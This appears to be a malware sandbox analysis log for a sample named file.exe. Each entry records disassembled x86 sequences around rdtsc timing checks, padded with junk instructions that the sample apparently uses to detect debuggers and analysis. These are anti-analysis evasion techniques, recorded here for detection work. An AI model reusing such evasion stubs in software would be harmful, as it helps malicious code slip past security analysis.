                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A4BA second address: 32A4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32BCF8 second address: 32BD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E2h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32BD0E second address: 32BD18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84B0D655F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DB68 second address: 32DB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F84B0B050D6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32DB78 second address: 32DB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jl 00007F84B0D655F6h 0x0000000e jg 00007F84B0D655F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D001B second address: 53D0044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F84B0B050E5h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0044 second address: 53D0049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0049 second address: 53D004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D004F second address: 53D0053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0EF5 second address: 53B0F04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F04 second address: 53B0F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F84B0D655FFh 0x00000009 jmp 00007F84B0D65603h 0x0000000e popfd 0x0000000f mov esi, 454F2EBFh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a push eax 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F84B0D65606h 0x00000023 pop ecx 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0E56 second address: 53F0E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0E5C second address: 53F0E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0E60 second address: 53F0E85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F84B0B050E2h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0E85 second address: 53F0E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0E89 second address: 53F0EA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390137 second address: 53901B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F84B0D655FEh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov ecx, 79077BEDh 0x00000017 mov ah, E9h 0x00000019 popad 0x0000001a push dword ptr [ebp+04h] 0x0000001d jmp 00007F84B0D65605h 0x00000022 push dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F84B0D65603h 0x0000002e or ax, 0C7Eh 0x00000033 jmp 00007F84B0D65609h 0x00000038 popfd 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53901B9 second address: 53901BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53901BE second address: 53901D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D655FDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0B99 second address: 53B0B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0B9F second address: 53B0BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0BA3 second address: 53B0C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F84B0B050E3h 0x00000019 pushfd 0x0000001a jmp 00007F84B0B050E8h 0x0000001f sub cx, 8568h 0x00000024 jmp 00007F84B0B050DBh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c jmp 00007F84B0B050E6h 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F84B0B050E7h 0x0000003a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0C2D second address: 53B0C6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F84B0D65605h 0x0000000b sub ah, FFFFFF96h 0x0000000e jmp 00007F84B0D65601h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F84B0D655FAh 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0671 second address: 53B06D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 42CEF6D0h 0x00000008 mov bh, AFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push esi 0x00000010 push edx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F84B0B050E1h 0x0000001d xor ch, 00000006h 0x00000020 jmp 00007F84B0B050E1h 0x00000025 popfd 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F84B0B050DEh 0x0000002d sbb ah, FFFFFFA8h 0x00000030 jmp 00007F84B0B050DBh 0x00000035 popfd 0x00000036 mov ah, 8Fh 0x00000038 popad 0x00000039 popad 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B06D9 second address: 53B06DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0393 second address: 53B03E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F84B0B050DEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F84B0B050DCh 0x00000017 jmp 00007F84B0B050E5h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F84B0B050DDh 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B03E9 second address: 53B044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F84B0D655FCh 0x00000011 pushad 0x00000012 mov esi, 50DB28E7h 0x00000017 movzx ecx, di 0x0000001a popad 0x0000001b popad 0x0000001c pop ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F84B0D65605h 0x00000024 adc ecx, 7419A006h 0x0000002a jmp 00007F84B0D65601h 0x0000002f popfd 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0300 second address: 53C0345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 3E8Ah 0x00000007 pushfd 0x00000008 jmp 00007F84B0B050DBh 0x0000000d sbb ax, 9D2Eh 0x00000012 jmp 00007F84B0B050E9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F84B0B050DDh 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D033C second address: 53D0342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0342 second address: 53D03AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F84B0B050DBh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F84B0B050E6h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F84B0B050DDh 0x00000020 sbb ah, 00000026h 0x00000023 jmp 00007F84B0B050E1h 0x00000028 popfd 0x00000029 jmp 00007F84B0B050E0h 0x0000002e popad 0x0000002f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B055C second address: 53B0561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0561 second address: 53B0590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 jmp 00007F84B0B050E1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F84B0B050DEh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0590 second address: 53B0594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0594 second address: 53B059A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B059A second address: 53B05C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e mov ch, dh 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F84B0D655FFh 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B05C8 second address: 53B05E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B05E0 second address: 53B05F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F84B0D655FAh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B05F5 second address: 53B05FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0EEB second address: 53C0F49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 75BE8AA3h 0x00000010 jmp 00007F84B0D65608h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movzx ecx, dx 0x0000001d jmp 00007F84B0D65609h 0x00000022 popad 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0F49 second address: 53C0F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F84B0B050E5h 0x00000010 mov ebp, esp 0x00000012 jmp 00007F84B0B050DEh 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0F80 second address: 53C0F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0F84 second address: 53C0FA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0180 second address: 53D0212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 mov edi, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e mov esi, 5EC18A5Dh 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 mov ax, dx 0x0000001a pushfd 0x0000001b jmp 00007F84B0D655FBh 0x00000020 or ax, 23CEh 0x00000025 jmp 00007F84B0D65609h 0x0000002a popfd 0x0000002b popad 0x0000002c call 00007F84B0D65600h 0x00000031 mov si, 72E1h 0x00000035 pop esi 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushfd 0x0000003c jmp 00007F84B0D65609h 0x00000041 sub eax, 6C36A166h 0x00000047 jmp 00007F84B0D65601h 0x0000004c popfd 0x0000004d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F06CC second address: 53F06F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov bh, C5h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov bl, cl 0x00000015 pushad 0x00000016 movsx edi, si 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F06F7 second address: 53F07FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ecx 0x00000007 jmp 00007F84B0D65600h 0x0000000c push eax 0x0000000d jmp 00007F84B0D655FBh 0x00000012 xchg eax, ecx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F84B0D65604h 0x0000001a and si, 6BB8h 0x0000001f jmp 00007F84B0D655FBh 0x00000024 popfd 0x00000025 push ecx 0x00000026 pushfd 0x00000027 jmp 00007F84B0D655FFh 0x0000002c sub si, E57Eh 0x00000031 jmp 00007F84B0D65609h 0x00000036 popfd 0x00000037 pop esi 0x00000038 popad 0x00000039 mov eax, dword ptr [775F65FCh] 0x0000003e jmp 00007F84B0D65607h 0x00000043 test eax, eax 0x00000045 jmp 00007F84B0D65606h 0x0000004a je 00007F8522EE87B4h 0x00000050 jmp 00007F84B0D65600h 0x00000055 mov ecx, eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c pushfd 0x0000005d jmp 00007F84B0D65603h 0x00000062 or eax, 29A6C24Eh 0x00000068 jmp 00007F84B0D65609h 0x0000006d popfd 0x0000006e popad 0x0000006f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F07FA second address: 53F0800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0800 second address: 53F0804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0804 second address: 53F086C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b jmp 00007F84B0B050E4h 0x00000010 and ecx, 1Fh 0x00000013 pushad 0x00000014 movzx eax, di 0x00000017 push ebx 0x00000018 pushfd 0x00000019 jmp 00007F84B0B050E6h 0x0000001e sbb ax, F458h 0x00000023 jmp 00007F84B0B050DBh 0x00000028 popfd 0x00000029 pop esi 0x0000002a popad 0x0000002b ror eax, cl 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007F84B0B050E0h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F086C second address: 53F0871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0871 second address: 53F093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e jmp 00007F84B0B050E9h 0x00000013 popad 0x00000014 retn 0004h 0x00000017 nop 0x00000018 mov esi, eax 0x0000001a lea eax, dword ptr [ebp-08h] 0x0000001d xor esi, dword ptr [00072014h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push eax 0x00000026 lea eax, dword ptr [ebp-10h] 0x00000029 push eax 0x0000002a call 00007F84B5EC598Eh 0x0000002f push FFFFFFFEh 0x00000031 jmp 00007F84B0B050DEh 0x00000036 pop eax 0x00000037 jmp 00007F84B0B050E0h 0x0000003c ret 0x0000003d nop 0x0000003e push eax 0x0000003f call 00007F84B5EC59A9h 0x00000044 mov edi, edi 0x00000046 jmp 00007F84B0B050E0h 0x0000004b xchg eax, ebp 0x0000004c pushad 0x0000004d mov si, 136Dh 0x00000051 call 00007F84B0B050DAh 0x00000056 mov di, cx 0x00000059 pop ecx 0x0000005a popad 0x0000005b push eax 0x0000005c jmp 00007F84B0B050DCh 0x00000061 xchg eax, ebp 0x00000062 jmp 00007F84B0B050E0h 0x00000067 mov ebp, esp 0x00000069 jmp 00007F84B0B050E0h 0x0000006e pop ebp 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F84B0B050E7h 0x00000076 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F093B second address: 53F0941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0941 second address: 53F0945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0070 second address: 53A00A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F84B0D65603h 0x0000000a xor ecx, 3DB4BEAEh 0x00000010 jmp 00007F84B0D65609h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A00A9 second address: 53A0144 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F84B0B050E7h 0x00000009 add ch, FFFFFFBEh 0x0000000c jmp 00007F84B0B050E9h 0x00000011 popfd 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 and esp, FFFFFFF8h 0x0000001a pushad 0x0000001b push edi 0x0000001c call 00007F84B0B050E2h 0x00000021 pop esi 0x00000022 pop ebx 0x00000023 popad 0x00000024 xchg eax, ecx 0x00000025 jmp 00007F84B0B050DEh 0x0000002a push eax 0x0000002b pushad 0x0000002c mov edi, 0D8345C4h 0x00000031 push edx 0x00000032 mov dl, cl 0x00000034 pop ebx 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 jmp 00007F84B0B050E0h 0x0000003c xchg eax, ebx 0x0000003d jmp 00007F84B0B050E0h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0144 second address: 53A0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0148 second address: 53A014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A014C second address: 53A0152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0152 second address: 53A0158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0158 second address: 53A015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A015C second address: 53A018A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F84B0B050DDh 0x0000000e mov ebx, dword ptr [ebp+10h] 0x00000011 jmp 00007F84B0B050DEh 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A018A second address: 53A018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A018E second address: 53A0194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0194 second address: 53A0199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0199 second address: 53A01CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F84B0B050DFh 0x00000014 jmp 00007F84B0B050E3h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A01CD second address: 53A01D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A01D2 second address: 53A0205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 mov esi, dword ptr [ebp+08h] 0x00000015 jmp 00007F84B0B050E7h 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0205 second address: 53A0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A0209 second address: 53A020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53A020D second address: 53A0213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
